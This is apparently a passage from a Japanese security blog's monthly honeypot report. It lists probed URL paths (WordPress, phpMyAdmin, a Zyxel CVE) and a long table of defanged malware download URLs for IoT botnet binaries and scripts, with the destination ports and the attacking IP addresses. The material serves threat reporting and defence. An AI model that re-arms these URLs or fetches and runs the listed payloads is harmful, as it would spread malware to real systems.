/user/xmlrpc.php	WordPress	-	-
/Nmap/folder/check1562208120	Nmap	-	-
/NmapUpperCheck1562208120	Nmap	-	-
/nmaplowercheck1562208120	Nmap	-	-
/user/soapCaller.bs	Morfeus Fucking Scanner	-	https://kaworu.jpn.org/kaworu/2008-12-27-1.php
hxxp://160[.]16[.]145[.]183/QUERY/en-us/msdn/	Unauthorized Relay	-	-
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup	Zyxel	CVE-2017-6884	https://www.exploit-db.com/exploits/41782
/myadmin/scripts/setup.php	phpMyAdmin	-	-
/phpMyAdmin/scripts/setup.php	phpMyAdmin	-	-
/phpmyadmin/scripts/setup.php	phpMyAdmin	-	-
/pma/scripts/setup.php	phpMyAdmin	-	-

<マルウェアダウンロード>

宛先ポート	ダウンロード先	攻撃元IP
52869	hxxp://185[.]52[.]2[.]192/Demon[.]mips	167[.]99[.]99[.]163
52869	hxxp://185[.]52[.]2[.]192/Demon[.]mips	159[.]203[.]65[.]214
52869	hxxp://185[.]52[.]2[.]192/Demon[.]mips	159[.]203[.]4[.]33
52869	hxxp://185[.]52[.]2[.]192/Demon[.]mips	138[.]68[.]58[.]92
52869	hxxp://91[.]209[.]70[.]174/Corona[.]mips	185[.]244[.]25[.]92
52869	hxxp://174[.]128[.]226[.]101/kr	107[.]173[.]222[.]169
52869	hxxp://174[.]128[.]226[.]101/kr	198[.]23[.]214[.]17
6379	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	220[.]194[.]237[.]43
8161	lsd[.]systemten[.]org	160[.]16[.]221[.]15
52869	hxxp://174[.]128[.]226[.]101/kr	107[.]173[.]222[.]169
6379	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	113[.]141[.]72[.]248
60001	hxxp:/\/185[.]244[.]25[.]185/bins/Jaws[.]sh	109[.]238[.]12[.]68
6381	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	220[.]194[.]237[.]43
52869	hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips	178[.]62[.]220[.]251
8161	lsd[.]systemten[.]org	160[.]16[.]221[.]15
6380	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	220[.]194[.]237[.]43
6378	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	220[.]194[.]237[.]43
8161	lsd[.]systemten[.]org	160[.]16[.]50[.]150
8161	lsd[.]systemten[.]org	160[.]16[.]79[.]209
37215	178[.]62[.]112[.]14	105[.]156[.]57[.]15
8161	lsd[.]systemten[.]org	160[.]16[.]134[.]40
8161	lsd[.]systemten[.]org	160[.]16[.]202[.]252
8161	lsd[.]systemten[.]org	160[.]16[.]204[.]135
8161	lsd[.]systemten[.]org	160[.]16[.]91[.]228
37215	hxxp://195[.]201[.]235[.]173	174[.]138[.]5[.]118
8161	lsd[.]systemten[.]org	160[.]16[.]50[.]150
8161	lsd[.]systemten[.]org	160[.]16[.]79[.]209
37215	174[.]128[.]226[.]101	107[.]173[.]222[.]169
37215	199[.]38[.]245[.]220	68[.]195[.]29[.]77
60001	hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh	185[.]172[.]110[.]226
801	hxxp://fid[.]hognoob[.]se/download[.]exe	196[.]229[.]36[.]164
801	hxxp://fid[.]hognoob[.]se/download[.]exe	196[.]229[.]36[.]164
5500	hxxp:/\/178[.]33[.]181[.]23/sh	167[.]86[.]77[.]222
5555	hxxp://185[.]244[.]25[.]241/k	94[.]192[.]84[.]33
5555	hxxp://185[.]99[.]254[.]29/bins/arm7	104[.]251[.]122[.]37
5555	hxxp://185[.]99[.]254[.]29/bins/arm7	104[.]251[.]122[.]37
5555	hxxp://185[.]99[.]254[.]29/bins/mpsl	104[.]251[.]122[.]37
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	106[.]75[.]6[.]203
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	106[.]75[.]6[.]203
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	58[.]82[.]212[.]148
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	221[.]182[.]115[.]133
8161	lsd[.]systemten[.]org	160[.]16[.]134[.]40
8161	lsd[.]systemten[.]org	160[.]16[.]202[.]252
8161	lsd[.]systemten[.]org	160[.]16[.]204[.]135
8161	lsd[.]systemten[.]org	160[.]16[.]91[.]228
9200	hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh	223[.]203[.]201[.]254
37215	178[.]62[.]114[.]122	79[.]24[.]106[.]146
37215	206[.]189[.]17[.]158	46[.]101[.]255[.]19
37215	206[.]189[.]170[.]165	212[.]19[.]119[.]8
37215	89[.]46[.]223[.]195	162[.]252[.]200[.]7
37215	89[.]46[.]223[.]195	79[.]53[.]81[.]185
52869	hxxp://168[.]235[.]89[.]216/IDJAPbins[.]sh	134[.]209[.]114[.]98
52869	hxxp://174[.]128[.]226[.]101/kr	185[.]153[.]180[.]246
60001	hxxp:/\/185[.]244[.]25[.]171/bins/Jaws[.]sh	109[.]238[.]12[.]68
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	219[.]77[.]18[.]91
443	hxxp://fid[.]hognoob[.]se/download[.]exe	182[.]76[.]76[.]206
443	hxxp://fid[.]hognoob[.]se/download[.]exe	182[.]76[.]76[.]206
443	hxxp://fid[.]hognoob[.]se/download[.]exe	182[.]76[.]76[.]206
800	hxxp://fid[.]hognoob[.]se/download[.]exe	197[.]26[.]162[.]168
800	hxxp://fid[.]hognoob[.]se/download[.]exe	197[.]26[.]162[.]168
800	hxxp://fid[.]hognoob[.]se/download[.]exe	197[.]26[.]162[.]168
801	hxxp://fid[.]hognoob[.]se/download[.]exe	129[.]213[.]81[.]87
801	hxxp://fid[.]hognoob[.]se/download[.]exe	129[.]213[.]81[.]87
801	hxxp://fid[.]hognoob[.]se/download[.]exe	213[.]153[.]210[.]53
801	hxxp://fid[.]hognoob[.]se/download[.]exe	213[.]153[.]210[.]53
5555	hxxp://134[.]209[.]183[.]3/z[.]sh	134[.]209[.]18[.]235
5555	hxxp://185[.]244[.]25[.]24/k	151[.]29[.]5[.]219
5555	hxxp://185[.]244[.]25[.]241/k	101[.]51[.]5[.]136
5555	hxxp://185[.]244[.]25[.]241/k	103[.]3[.]224[.]190
5555	hxxp://185[.]244[.]25[.]241/k	104[.]205[.]11[.]120
5555	hxxp://185[.]244[.]25[.]241/k	109[.]116[.]204[.]63
5555	hxxp://185[.]244[.]25[.]241/k	112[.]137[.]35[.]5
5555	hxxp://185[.]244[.]25[.]241/k	116[.]251[.]1[.]72
5555	hxxp://185[.]244[.]25[.]241/k	122[.]138[.]100[.]6
5555	hxxp://185[.]244[.]25[.]241/k	130[.]0[.]189[.]117
5555	hxxp://185[.]244[.]25[.]241/k	151[.]63[.]25[.]250
5555	hxxp://185[.]244[.]25[.]241/k	162[.]40[.]137[.]97
5555	hxxp://185[.]244[.]25[.]241/k	171[.]13[.]150[.]58
5555	hxxp://185[.]244[.]25[.]241/k	171[.]234[.]115[.]32
5555	hxxp://185[.]244[.]25[.]241/k	174[.]49[.]67[.]132
5555	hxxp://185[.]244[.]25[.]241/k	175[.]139[.]77[.]69
5555	hxxp://185[.]244[.]25[.]241/k	176[.]223[.]72[.]122
5555	hxxp://185[.]244[.]25[.]241/k	177[.]105[.]116[.]22
5555	hxxp://185[.]244[.]25[.]241/k	177[.]71[.]59[.]193
5555	hxxp://185[.]244[.]25[.]241/k	180[.]130[.]153[.]49
5555	hxxp://185[.]244[.]25[.]241/k	182[.]253[.]65[.]183
5555	hxxp://185[.]244[.]25[.]241/k	188[.]217[.]185[.]71
5555	hxxp://185[.]244[.]25[.]241/k	188[.]49[.]46[.]158
5555	hxxp://185[.]244[.]25[.]241/k	190[.]12[.]177[.]88
5555	hxxp://185[.]244[.]25[.]241/k	191[.]162[.]43[.]35
5555	hxxp://185[.]244[.]25[.]241/k	197[.]227[.]172[.]131
5555	hxxp://185[.]244[.]25[.]241/k	27[.]76[.]50[.]21
5555	hxxp://185[.]244[.]25[.]241/k	37[.]135[.]73[.]41
5555	hxxp://185[.]244[.]25[.]241/k	37[.]182[.]29[.]57
5555	hxxp://185[.]244[.]25[.]241/k	39[.]77[.]231[.]147
5555	hxxp://185[.]244[.]25[.]241/k	42[.]2[.]209[.]84
5555	hxxp://185[.]244[.]25[.]241/k	42[.]200[.]116[.]26
5555	hxxp://185[.]244[.]25[.]241/k	42[.]52[.]170[.]23
5555	hxxp://185[.]244[.]25[.]241/k	46[.]152[.]121[.]109
5555	hxxp://185[.]244[.]25[.]241/k	70[.]31[.]239[.]253
5555	hxxp://185[.]244[.]25[.]241/k	73[.]89[.]44[.]194
5555	hxxp://185[.]244[.]25[.]241/k	77[.]76[.]180[.]169
5555	hxxp://185[.]244[.]25[.]241/k	78[.]101[.]87[.]97
5555	hxxp://185[.]244[.]25[.]241/k	79[.]111[.]33[.]39
5555	hxxp://185[.]244[.]25[.]241/k	92[.]98[.]237[.]36
5555	hxxp://185[.]70[.]105[.]35/teqbins[.]sh	61[.]216[.]81[.]44
5555	hxxp://185[.]99[.]254[.]29/bins/arm7	104[.]251[.]122[.]37
5555	hxxp://185[.]99[.]254[.]29/bins/x86	104[.]251[.]122[.]37
5555	hxxp://185[.]99[.]254[.]29/bins/x86	104[.]251[.]122[.]37
5555	hxxp://209[.]97[.]163[.]186/c	112[.]170[.]69[.]163
5555	hxxp://68[.]183[.]39[.]48/icy[.]sh	182[.]254[.]168[.]229
5555	hxxp://87[.]120[.]254[.]184/curl1	185[.]164[.]72[.]227
5555	hxxp://87[.]120[.]254[.]184/curl1	80[.]82[.]70[.]43
6379	hxxp://w[.]lazer-n[.]com:43768/lll[.]sh	119[.]253[.]84[.]102
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	123[.]157[.]252[.]90
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	123[.]157[.]252[.]90
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	129[.]213[.]50[.]59
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	129[.]213[.]50[.]59
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	143[.]107[.]73[.]221
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	143[.]107[.]73[.]221
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	177[.]191[.]190[.]174
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	177[.]191[.]190[.]174
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	183[.]89[.]159[.]107
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	183[.]89[.]159[.]107
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	191[.]5[.]245[.]144
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	191[.]5[.]245[.]144
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	191[.]55[.]142[.]52
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	191[.]55[.]142[.]52
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	213[.]150[.]178[.]174
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	213[.]150[.]178[.]174
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	221[.]230[.]132[.]58
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	36[.]91[.]102[.]138
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	36[.]91[.]102[.]138
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	36[.]91[.]102[.]138
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	36[.]91[.]102[.]138
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	5[.]1[.]38[.]129
7001	hxxp://fid[.]hognoob[.]se/download[.]exe	5[.]1[.]38[.]129
8000	hxxp://209[.]141[.]40[.]213/avtech	209[.]52[.]149[.]41
8000	hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips	159[.]203[.]18[.]21
8060	hxxp://fid[.]hognoob[.]se/download[.]exe	165[.]56[.]0[.]30
8080	hxxp://134[.]209[.]183[.]3/akbins/mpsl[.]akira[.]ak	134[.]209[.]28[.]200
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	109[.]124[.]148[.]167
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	121[.]179[.]46[.]82
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	124[.]133[.]108[.]34
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	148[.]63[.]18[.]12
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	182[.]34[.]123[.]90
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	213[.]192[.]56[.]195
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	222[.]218[.]220[.]101
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	46[.]105[.]209[.]48
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	66[.]168[.]88[.]53
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	83[.]29[.]229[.]22
8080	hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl	93[.]100[.]110[.]69
8080	hxxp://fid[.]hognoob[.]se/download[.]exe	143[.]0[.]151[.]173
8080	hxxp://fid[.]hognoob[.]se/download[.]exe	143[.]0[.]151[.]173
8080	hxxp://hulo[.]r00ts[.]online/[.]config/Lrep	122[.]116[.]216[.]224
8080	hxxp://hulo[.]r00ts[.]online/FleX/Lrep	118[.]232[.]136[.]122
8080	hxxp://hulo[.]r00ts[.]online/FleX/Lrep	88[.]249[.]249[.]27
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	120[.]236[.]87[.]152
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	120[.]236[.]87[.]152
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	120[.]236[.]87[.]152
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	41[.]226[.]251[.]178
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	41[.]226[.]251[.]178
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	85[.]105[.]111[.]237
8088	hxxp://fid[.]hognoob[.]se/download[.]exe	85[.]105[.]111[.]237
8111	hxxp://fid[.]hognoob[.]se/download[.]exe	40[.]68[.]131[.]225
8111	hxxp://fid[.]hognoob[.]se/download[.]exe	40[.]68[.]131[.]225
8111	hxxp://fid[.]hognoob[.]se/download[.]exe	40[.]68[.]131[.]225
9200	hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh	3[.]213[.]101[.]190
9200	hxxp://216[.]176[.]179[.]106:9090/26006\	202[.]109[.]143[.]110
9888	hxxp://fid[.]hognoob[.]se/download[.]exe	185[.]48[.]149[.]115
9999	hxxp://fid[.]hognoob[.]se/download[.]exe	218[.]62[.]29[.]165
9999	hxxp://fid[.]hognoob[.]se/download[.]exe	218[.]62[.]29[.]165
9999	hxxp://fid[.]hognoob[.]se/download[.]exe	43[.]254[.]125[.]41
9999	hxxp://fid[.]hognoob[.]se/download[.]exe	43[.]254[.]125[.]41
37215	103[.]83[.]157[.]41	142[.]93[.]113[.]113
37215	104[.]248[.]93[.]159	68[.]183[.]151[.]62
37215	157[.]230[.]173[.]232	145[.]239[.]168[.]176
37215	157[.]230[.]173[.]232	37[.]6[.]230[.]115
37215	157[.]230[.]173[.]232	79[.]107[.]238[.]19
37215	157[.]230[.]173[.]232	79[.]107[.]244[.]144
37215	159[.]203[.]21[.]20	77[.]42[.]104[.]114
37215	159[.]65[.]240[.]150	88[.]36[.]135[.]138
37215	159[.]89[.]38[.]57	106[.]13[.]52[.]123
37215	178[.]62[.]112[.]14	60[.]8[.]213[.]120
37215	178[.]62[.]114[.]122	151[.]30[.]69[.]79
37215	178[.]62[.]114[.]122	199[.]182[.]137[.]148
37215	178[.]62[.]114[.]122	212[.]210[.]31[.]47
37215	178[.]62[.]114[.]122	37[.]130[.]113[.]38
37215	178[.]62[.]114[.]122	79[.]12[.]199[.]206
37215	185[.]244[.]25[.]235	149[.]129[.]132[.]231
37215	185[.]244[.]25[.]235	34[.]85[.]97[.]138
37215	185[.]244[.]25[.]235	47[.]92[.]54[.]63
37215	206[.]189[.]170[.]165	151[.]24[.]171[.]42
37215	206[.]189[.]170[.]165	151[.]30[.]33[.]254
37215	206[.]189[.]170[.]165	151[.]30[.]62[.]96
37215	206[.]189[.]170[.]165	151[.]32[.]113[.]220
37215	206[.]189[.]170[.]165	151[.]32[.]61[.]221
37215	206[.]189[.]170[.]165	151[.]52[.]39[.]144
37215	206[.]189[.]170[.]165	151[.]64[.]117[.]217
37215	206[.]189[.]170[.]165	212[.]19[.]112[.]212
37215	206[.]189[.]170[.]165	212[.]19[.]116[.]205
37215	206[.]189[.]170[.]165	79[.]23[.]98[.]90
37215	206[.]189[.]170[.]165	79[.]47[.]184[.]216
37215	206[.]189[.]170[.]165	79[.]52[.]2[.]81
37215	209[.]141[.]43[.]15	220[.]127[.]239[.]7
37215	209[.]97[.]136[.]57	85[.]134[.]12[.]144
37215	37[.]49[.]225[.]230	37[.]202[.]111[.]58
37215	37[.]49[.]225[.]230	37[.]202[.]127[.]16
37215	37[.]49[.]225[.]230	46[.]185[.]139[.]32
37215	68[.]183[.]39[.]48	68[.]183[.]151[.]62
37215	68[.]183[.]39[.]48	68[.]183[.]151[.]62
37215	89[.]190[.]159[.]189	151[.]40[.]20[.]117
37215	89[.]190[.]159[.]189	151[.]49[.]112[.]101
37215	89[.]190[.]159[.]189	152[.]171[.]67[.]142
37215	89[.]190[.]159[.]189	188[.]136[.]243[.]230
37215	89[.]190[.]159[.]189	79[.]46[.]88[.]134
37215	89[.]190[.]159[.]189	80[.]15[.]216[.]26
37215	89[.]34[.]26[.]202	174[.]138[.]0[.]191
37215	89[.]46[.]223[.]195	162[.]255[.]122[.]178
37215	hxxp://213[.]166[.]69[.]64	174[.]138[.]5[.]118
52869	hxxp://174[.]128[.]226[.]101/kr	185[.]101[.]105[.]192
52869	hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips	188[.]166[.]48[.]241
52869	hxxp://213[.]166[.]69[.]64/akbins/mips[.]akirag	174[.]138[.]0[.]191
55555	ftp -r	185[.]172[.]110[.]246
60001	hxxp:/\/178[.]33[.]181[.]23/infect	167[.]86[.]77[.]222
60001	hxxp:/\/178[.]33[.]181[.]23/sh	167[.]86[.]77[.]222
60001	hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh	45[.]8[.]159[.]175
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	1[.]4[.]188[.]23
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	101[.]108[.]98[.]16
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	103[.]133[.]64[.]68
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	104[.]205[.]11[.]120
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	108[.]30[.]142[.]74
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	112[.]119[.]70[.]4
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	112[.]243[.]249[.]179
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	113[.]231[.]104[.]95
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	114[.]203[.]95[.]52
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	115[.]96[.]156[.]121
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	118[.]81[.]99[.]146
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	120[.]1[.]136[.]29
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	125[.]26[.]203[.]175
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	151[.]70[.]197[.]241
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	163[.]158[.]203[.]173
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	175[.]151[.]238[.]175
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	178[.]221[.]57[.]209
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	182[.]180[.]121[.]222
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	185[.]18[.]46[.]110
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	188[.]49[.]46[.]158
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	189[.]26[.]196[.]203
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	190[.]221[.]92[.]136
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	191[.]243[.]231[.]64
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	196[.]229[.]230[.]251
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	197[.]0[.]168[.]186
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	2[.]89[.]166[.]11
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	219[.]139[.]232[.]108
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	222[.]72[.]116[.]147
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	27[.]192[.]11[.]108
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	27[.]76[.]50[.]21
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	35[.]199[.]147[.]245
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	37[.]202[.]100[.]185
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	39[.]44[.]40[.]234
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	39[.]45[.]138[.]80
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	41[.]138[.]117[.]19
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	41[.]143[.]237[.]2
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	42[.]53[.]118[.]250
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	5[.]219[.]171[.]187
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	5[.]236[.]217[.]102
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	58[.]10[.]74[.]65
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	61[.]175[.]101[.]165
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	68[.]194[.]230[.]145
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	93[.]46[.]58[.]233
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	93[.]81[.]10[.]51
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	94[.]231[.]164[.]168
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	95[.]137[.]251[.]164
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	95[.]219[.]163[.]24
60001	hxxp:/\/185[.]244[.]25[.]241/b/arm7	95[.]249[.]151[.]66

以上となります。

sec-chick Blog

サイバーセキュリティブログ

【ハニーポット月次分析】Honeypot 6月度〜VNC宛て通信増加中〜